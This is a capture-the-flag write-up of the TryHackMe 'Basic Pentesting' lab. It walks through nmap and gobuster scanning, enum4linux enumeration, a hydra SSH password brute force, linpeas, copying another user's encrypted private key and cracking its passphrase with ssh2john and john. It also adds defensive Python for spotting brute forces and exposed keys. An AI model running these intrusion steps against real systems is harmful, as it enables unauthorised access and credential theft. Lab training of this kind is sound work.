# Basic Pentesting

Try this challenge in [TryHackMe: **Basic Pentesting**](https://tryhackme.com/r/room/basicpentestingjt)

> In doing this challenge, I learned the following skills and tools:
>
> * **brute forcing** - using <mark style="color:orange;">**hydra**</mark>
> * **hash cracking** - using <mark style="color:orange;">**ssh2john**</mark>, <mark style="color:orange;">**john**</mark>
> * **service enumeration** - using <mark style="color:orange;">**nmap**</mark>, <mark style="color:orange;">**gobuster**</mark>
> * **Linux Enumeration** - using <mark style="color:orange;">**enum4linux**</mark>, <mark style="color:orange;">**linpeas**</mark>

## Web App Testing and Privilege Escalation

### Find the services exposed by the machine

Run <mark style="color:orange;">**nmap**</mark> with default scripts and version detection, saving the output to a `basicpentest` directory

{% code lineNumbers="true" %}

```bash
mkdir basicpentest
# -sC default NSE scripts, -sV service/version detection, -oN normal-format output file
nmap -sC -sV 10.10.X.X -oN basicpentest/initial
```

{% endcode %}

{% hint style="info" %}
Just change the **`10.10.X.X`** to the IP address assigned to your target machine
{% endhint %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FqTagQQnUhoqC9MNF62Br%2FScreenshot_2024-08-15_at_15.19.14.png?alt=media&#x26;token=38a67366-550e-4f94-b43a-3b38b39ef5e2" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F0Qn0yJ4k1x6KmWWsDtQv%2FScreenshot_2024-08-15_at_15.20.19.png?alt=media&#x26;token=808e8607-0174-40ae-9022-bb2c86a5ce36" alt="" width="563"><figcaption></figcaption></figure>

Check it in the browser: **`http://10.10.X.X`**

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FTxbVFDs2Zt75vPhjpYMF%2FScreenshot_2024-08-15_at_15.22.49.png?alt=media&#x26;token=514dea65-5138-414d-940c-54a7970a9928" alt="" width="563"><figcaption></figcaption></figure>

Try **`View Page Source`**. An HTML comment (rendered in green by the browser's source viewer) tells developers to <mark style="color:green;">**check their dev note section**</mark>.

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FvbUpnUqxGFBo9ANa6cJa%2FScreenshot_2024-08-15_at_15.23.10.png?alt=media&#x26;token=b68f5158-1ac5-48f3-8aed-8374f22696d8" alt="" width="563"><figcaption></figcaption></figure>

So let's check whether there is a **`/dev`** directory.

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FzJeBgXH71ohX14qP0U0z%2FScreenshot_2024-08-15_at_15.23.28.png?alt=media&#x26;token=f89cdc7b-2013-4752-aff4-52af0e8d2d01" alt="" width="563"><figcaption></figcaption></figure>

Both guesses return **Not Found**, but the Apache error page itself discloses something worth noting:

{% hint style="info" %}
**Apache/2.4.18 (Ubuntu) Server at 10.10.X.X Port 80**

This footer is Apache's `ServerSignature`, and the full version string is there because `ServerTokens` was left at Ubuntu's default. It pins down the exact httpd release and operating system for later research.
{% endhint %}

### What is the name of the hidden directory on the web server (enter name without /)?

Using <mark style="color:orange;">**gobuster**</mark>, let's brute-force directory names on the web server.

{% code overflow="wrap" %}

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.X.X
```

{% endcode %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FgUl7EUTm7UqcS2BoEp8u%2Fimage.png?alt=media&#x26;token=d6cb02da-3949-44aa-85ea-89465338a2af" alt="" width="563"><figcaption></figcaption></figure>

Even before the scan finishes, gobuster finds the directory **`/development`**.

Browsing to it shows a listing with two text files, **`dev.txt`** and **`j.txt`**. Let's open both.

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2Fo2eAWYLYkWsHcV04NHVG%2Fimage.png?alt=media&#x26;token=25ec684a-1f82-46fa-9096-772e8dbb7e13" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F1KJybQMXl833n3bqNxem%2Fimage.png?alt=media&#x26;token=e42d27c8-016a-4eb7-9fac-2e8468254aa6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2Fc0BvIxew6aNaNYdxlNrI%2Fimage.png?alt=media&#x26;token=c1215184-433d-4999-962d-9cffc070e1cb" alt=""><figcaption></figcaption></figure>

### User brute-forcing to find the username & password

We found the users `jan` & `kay` with <mark style="color:orange;">**enum4linux**</mark>, which enumerates the SMB service (`-a` runs every check):

```bash
# -a runs all enumeration checks; tee keeps a copy of the output for later
/usr/bin/enum4linux -a 10.10.X.X | tee enum4linux.log
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F0iMq7iawZKFh9lhY4jox%2FScreenshot_2024-08-15_at_16.09.59.png?alt=media&#x26;token=0ff4739d-9e6f-4e0b-bcbd-8209b9f133f2" alt="" width="563"><figcaption></figcaption></figure>

With a username in hand, <mark style="color:orange;">**hydra**</mark> brute-forces jan's SSH password from the rockyou wordlist:

```bash
# -l single username, -P password list; add -t 4 if the SSH server drops parallel connections
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F7NRFPkKAHdMWCPKilRJz%2FScreenshot_2024-08-15_at_16.23.42.png?alt=media&#x26;token=42053d47-0b9d-42e3-a2d2-b2d72eb26359" alt="" width="563"><figcaption></figcaption></figure>

Now that we know jan's credentials, we used them to log in via SSH.
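What this brute force looks like from the target's side, as an added example that is not part of the original walkthrough: every rejected password becomes a `Failed password` line in sshd's auth log, so a burst of failures from one source followed by an `Accepted` is the whole attack in a handful of lines. The log lines, host name and addresses below are constructed for the example, and the threshold of five is an assumption, not a sshd or fail2ban default.

```python
"""Added example (not from the original walkthrough): minimal detection of
an SSH password brute force over constructed auth.log lines.

OpenSSH logs each rejected password as
  'Failed password for <user> from <ip> port <port> ssh2'
or, for a nonexistent account,
  'Failed password for invalid user <user> from <ip> port <port> ssh2'
and a successful login as 'Accepted <method> for <user> from <ip> ...'.
"""
import re
from collections import Counter

# Constructed sample: a short hydra burst against 'jan' that finally succeeds,
# one stray probe for a nonexistent user, and an unrelated single failure.
SAMPLE_AUTH_LOG = """\
Aug 15 16:20:01 target sshd[1201]: Failed password for jan from 10.10.14.5 port 40210 ssh2
Aug 15 16:20:01 target sshd[1203]: Failed password for jan from 10.10.14.5 port 40212 ssh2
Aug 15 16:20:02 target sshd[1205]: Failed password for jan from 10.10.14.5 port 40214 ssh2
Aug 15 16:20:02 target sshd[1207]: Failed password for invalid user admin from 10.10.14.5 port 40216 ssh2
Aug 15 16:20:03 target sshd[1209]: Failed password for jan from 10.10.14.5 port 40218 ssh2
Aug 15 16:20:03 target sshd[1211]: Failed password for jan from 10.10.14.5 port 40220 ssh2
Aug 15 16:20:04 target sshd[1213]: Accepted password for jan from 10.10.14.5 port 40222 ssh2
Aug 15 16:25:40 target sshd[1300]: Failed password for kay from 10.10.14.9 port 51002 ssh2
"""

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def count_failures(log_text):
    """Return a Counter of failed logins keyed by (source ip, target user)."""
    counts = Counter()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            counts[(m.group("ip"), m.group("user"))] += 1
    return counts


def flag_sources(log_text, threshold=5):
    """Source IPs with at least `threshold` failed passwords across all users."""
    per_ip = Counter()
    for (ip, _user), n in count_failures(log_text).items():
        per_ip[ip] += n
    return sorted(ip for ip, n in per_ip.items() if n >= threshold)


def successes_after_failures(log_text, threshold=5):
    """(ip, user) pairs where an 'Accepted' follows at least `threshold`
    failures from the same ip for that user: a brute force that worked."""
    failures = Counter()
    hits = []
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[(m.group("ip"), m.group("user"))] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            key = (m.group("ip"), m.group("user"))
            if failures[key] >= threshold:
                hits.append(key)
    return hits


if __name__ == "__main__":
    print(flag_sources(SAMPLE_AUTH_LOG))                # ['10.10.14.5']
    print(successes_after_failures(SAMPLE_AUTH_LOG))     # [('10.10.14.5', 'jan')]
```

Hydra's default of 16 parallel connections produces exactly this pattern (many failures per second from one address), which is why a real engagement either lowers `-t` or accepts that the attempt will be logged and possibly rate-limited.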

Look around the filesystem to see if we can find interesting files

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FCA4gH1u6SXPlO7CZzlUe%2FScreenshot_2024-08-15_at_16.47.53.png?alt=media&#x26;token=3bb74a72-644e-45c6-b234-ee042ae2a50f" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FQ2ofQnHLiM8VpAuxf2rV%2FScreenshot_2024-08-15_at_16.53.25.png?alt=media&#x26;token=5474a8d8-1ee4-4923-94a8-79b00c0f637d" alt="" width="563"><figcaption></figcaption></figure>

Since most actions were denied, we ran <mark style="color:orange;">**linpeas**</mark> on the machine to look for privilege escalation paths.

Copy `linpeas.sh` to the machine's `/tmp` directory over SSH with jan's credentials:

```bash
# uses jan's password from the hydra step; /tmp is writable by any user on the target
scp linpeas.sh jan@10.10.X.X:/tmp
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FCEKF9JYpY2seOiinb3Ah%2FScreenshot_2024-08-16_at_12.53.41.png?alt=media&#x26;token=221f540a-02b4-4c9e-84e3-aa266e9dd54a" alt="" width="563"><figcaption></figcaption></figure>

On the target, check that `linpeas.sh` transferred successfully

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FTUSqr3eBR5MxhoDoLJew%2F01236c21-9255-4754-8f69-207e7deb036a.png?alt=media&#x26;token=5f49fbdc-761a-4d66-9be0-df85142760b9" alt="" width="563"><figcaption></figcaption></figure>

Make linpeas executable:

```bash
chmod +x linpeas.sh 
```

Then execute linpeas:

```bash
./linpeas.sh
```

Among the linpeas findings: kay's private SSH key, `/home/kay/.ssh/id_rsa`, is readable by jan.

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FPKJHmuUFv9ByYdf00fXE%2FScreenshot_2024-08-16_at_13.23.47.png?alt=media&#x26;token=44766fda-aa8d-4e5b-9c2d-6d931d6fc5ca" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2F7nTln8ykL08Y0KGkIsJ9%2FScreenshot_2024-08-16_at_13.42.42.png?alt=media&#x26;token=8d53c253-63a7-47bf-965b-3817ffa6adaf" alt="" width="563"><figcaption></figcaption></figure>
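The check linpeas just ran for us, done by hand, as an added example that is not part of the original walkthrough: a private key whose mode lets group or others read it is the misconfiguration that lets one local user walk off with another's key. OpenSSH refuses to *use* such a key, but nothing stops someone else from copying it. The directory tree is constructed for the demo (the user names mirror the walkthrough, the key bodies are dummies) and is built in a temporary directory.

```python
"""Added example (not from the original walkthrough or from linpeas):
find private key files that other local users can read.
"""
import os
import stat
import tempfile

# PEM armour lines that mark a private key on disk
KEY_HEADERS = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
    b"-----BEGIN ENCRYPTED PRIVATE KEY-----",
)


def looks_like_private_key(path, max_bytes=64):
    """True if the file starts with a private-key armour line."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(max_bytes)
    except OSError:  # not readable by us; a 0640 key we are not in the group of is missed
        return False
    return any(head.startswith(h) for h in KEY_HEADERS)


def find_exposed_keys(root):
    """Return sorted (relative path, octal mode) for private keys whose own
    mode bits grant read to group or others. Only the file mode is checked;
    the parent directory's mode is a separate question, and a 0644 key is
    the thing to fix regardless of where it sits."""
    exposed = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not looks_like_private_key(path):
                continue
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                exposed.append((os.path.relpath(path, root), oct(mode)))
    return sorted(exposed)


def build_demo_tree():
    """Constructed fixture: two home directories, one key left world-readable."""
    root = tempfile.mkdtemp(prefix="keyaudit_")
    fake_key = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                b"Proc-Type: 4,ENCRYPTED\n"
                b"(dummy body, constructed for the demo)\n"
                b"-----END RSA PRIVATE KEY-----\n")
    for user, mode in (("kay", 0o644), ("jan", 0o600)):
        ssh_dir = os.path.join(root, "home", user, ".ssh")
        os.makedirs(ssh_dir)
        key_path = os.path.join(ssh_dir, "id_rsa")
        with open(key_path, "wb") as fh:
            fh.write(fake_key)
        os.chmod(key_path, mode)  # explicit, so the caller's umask does not matter
        # the public half is meant to be readable and must not be reported
        with open(key_path + ".pub", "wb") as fh:
            fh.write(b"ssh-rsa AAAA... demo\n")
    return root


if __name__ == "__main__":
    for rel, mode in find_exposed_keys(build_demo_tree()):
        print(mode, rel)  # 0o644 home/kay/.ssh/id_rsa
```

Run against `/home` on a real host this reports the same files linpeas lists under its SSH key checks, and nothing for keys already at 0600.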

Open the id\_rsa file then copy the contents

```bash
cat id_rsa
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FsmtFUdExAkHYbd2irGVW%2FScreenshot_2024-08-16_at_13.43.14.png?alt=media&#x26;token=a402fa20-caab-46ac-ac44-fc6a1a5e6d69" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2Fpe5dVMD9EUICu3LalkIR%2FScreenshot_2024-08-16_at_13.43.36.png?alt=media&#x26;token=33ae6ca7-f195-4f0b-93d0-ee7b5ad27710" alt="" width="563"><figcaption></figcaption></figure>

On your attacking (Kali) machine, paste the contents into a file named `kay_id_rsa`

```bash
nano kay_id_rsa
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2Frgn04xNeYXPLbN0dB5mi%2FScreenshot_2024-08-16_at_13.45.24.png?alt=media&#x26;token=179d0802-1b92-4d4b-bfeb-24d9a0ee1263" alt="" width="563"><figcaption></figcaption></figure>

Restrict the file so it is readable and writable only by you; ssh refuses to use a private key with looser permissions

```bash
chmod 600 kay_id_rsa
```

Try logging in as kay with the copied key

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FMVvPNFSUNGD9UWJ5Tjov%2FScreenshot_2024-08-16_at_13.47.05.png?alt=media&#x26;token=db1978dd-1f79-4223-9cce-a72fca210d4a" alt="" width="563"><figcaption></figcaption></figure>

ssh prompts for a passphrase: the key is encrypted, so we have to crack the passphrase before the key is usable.
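Before reaching for ssh2john it is worth reading the key file's own header, because the on-disk format says whether the key is encrypted at all and how expensive every passphrase guess will be. The parser below is an added example, not from the original walkthrough or from John the Ripper. Both sample keys are constructed: the legacy PEM ones carry a dummy body, and the `openssh-key-v1` one is assembled from just the header fields a parser reads, with no key material behind them, so nothing here is kay's key.

```python
"""Added example (not from the original walkthrough): inspect an SSH private
key and report whether it is encrypted and with which cipher and KDF.

Two on-disk formats matter:
  * legacy PEM ('BEGIN RSA PRIVATE KEY'): encrypted when it carries a
    'Proc-Type: 4,ENCRYPTED' header; the cipher key is derived from the
    passphrase with one MD5 pass (OpenSSL EVP_BytesToKey), so each guess is cheap.
  * openssh-key-v1 ('BEGIN OPENSSH PRIVATE KEY'): the base64 blob starts with
    ciphername and kdfname; 'none' means unencrypted, 'bcrypt' means each guess
    costs `rounds` iterations of bcrypt_pbkdf (ssh-keygen's default is 16).
"""
import base64
import re
import struct


def _read_string(blob, off):
    """SSH wire 'string': uint32 big-endian length, then that many bytes."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(text):
    """Return {'format', 'encrypted', 'cipher', 'kdf', 'rounds'} for a PEM-armoured key."""
    m = re.search(r"-----BEGIN ([A-Z ]+?)-----\n(.*?)-----END", text, re.S)
    if not m:
        raise ValueError("not a PEM-armoured private key")
    label, body = m.group(1), m.group(2)

    if label == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(body.split()))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        info = {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": None}
        if kdf == b"bcrypt":  # kdfoptions = string salt || uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (info["rounds"],) = struct.unpack(">I", kdfopts[o:o + 4])
        return info

    # legacy PEM: optional RFC 1421 headers, a blank line, then the base64 body
    head, sep, _rest = body.partition("\n\n")
    headers = {}
    if sep:
        for line in head.splitlines():
            k, _, v = line.partition(":")
            headers[k.strip()] = v.strip()
    encrypted = headers.get("Proc-Type") == "4,ENCRYPTED"
    return {"format": "legacy-pem", "encrypted": encrypted,
            "cipher": headers["DEK-Info"].split(",")[0] if encrypted else "none",
            "kdf": "EVP_BytesToKey(MD5, 1 iteration)" if encrypted else "none",
            "rounds": 1 if encrypted else None}


def _string(b):
    return struct.pack(">I", len(b)) + b


def make_openssh_v1_header(cipher, kdf, salt=b"\x00" * 16, rounds=16):
    """Constructed fixture: only the leading fields of an openssh-key-v1 blob,
    which is all inspect_private_key() reads. No key material follows."""
    kdfopts = (_string(salt) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    blob = (b"openssh-key-v1\x00" + _string(cipher) + _string(kdf)
            + _string(kdfopts) + struct.pack(">I", 1))  # nkeys = 1
    b64 = base64.b64encode(blob).decode()
    lines = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{lines}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed legacy PEM samples; the base64 body is a dummy, not a real key.
LEGACY_ENCRYPTED = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF\n"
    "\n"
    "QUJDREVGR0hJSktMTU5PUA==\n"
    "-----END RSA PRIVATE KEY-----\n"
)
LEGACY_PLAIN = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "QUJDREVGR0hJSktMTU5PUA==\n"
    "-----END RSA PRIVATE KEY-----\n"
)

if __name__ == "__main__":
    print(inspect_private_key(LEGACY_ENCRYPTED))
    print(inspect_private_key(make_openssh_v1_header(b"aes256-ctr", b"bcrypt")))
```

A legacy PEM key costs john roughly one MD5 and one block decrypt per guess, so a rockyou run finishes quickly; an `openssh-key-v1` key with `bcrypt` at 16 or more rounds costs orders of magnitude more per guess. OpenSSH has written the new format by default since 7.8, which is the defender's side of this step: a key generated on a current system with a decent passphrase would not have fallen this easily.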

To recover the passphrase, we use <mark style="color:orange;">**ssh2john**</mark>, which ships with John the Ripper and turns the encrypted key into a hash that john can attack

```bash
ssh2john ~/kay_id_rsa
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2Ffe9YjyBh4y9kkwlOaGyW%2FScreenshot_2024-08-16_at_14.24.31.png?alt=media&#x26;token=7e9c7eb1-a25e-43c6-b874-80fa7c3a1bbe" alt="" width="563"><figcaption></figcaption></figure>

Save that hash to a file so <mark style="color:orange;">**john**</mark> can work on it

```bash
ssh2john ~/kay_id_rsa > ~/kay_id_rsa_john.txt
```

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FgLJj2oKKs9DybULlqOO5%2FScreenshot_2024-08-16_at_13.48.55.png?alt=media&#x26;token=abffe199-183a-4576-9586-b1bdf09fa7ec" alt="" width="563"><figcaption></figcaption></figure>

Running <mark style="color:orange;">**john**</mark> against the hash file cracks the passphrase

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FMNzxxcdxKaAhrUmnJNlK%2FScreenshot_2024-08-16_at_14.23.57.png?alt=media&#x26;token=4999ecb6-d1a9-4188-9d93-74097ac307fa" alt="" width="563"><figcaption></figcaption></figure>

We can now log in as kay with the key and the cracked passphrase

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

{% hint style="success" %}
Opening the **pass.bak** file reveals the final password
{% endhint %}

<figure><img src="https://290105472-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F89FZKOizBQcf0e0Qdrp8%2Fuploads%2FAXJ2mwmg4j1ZWcPoreLs%2Fimage.png?alt=media&#x26;token=95f214b7-a35e-4f2c-8192-0cb9dc6009ea" alt=""><figcaption></figcaption></figure>
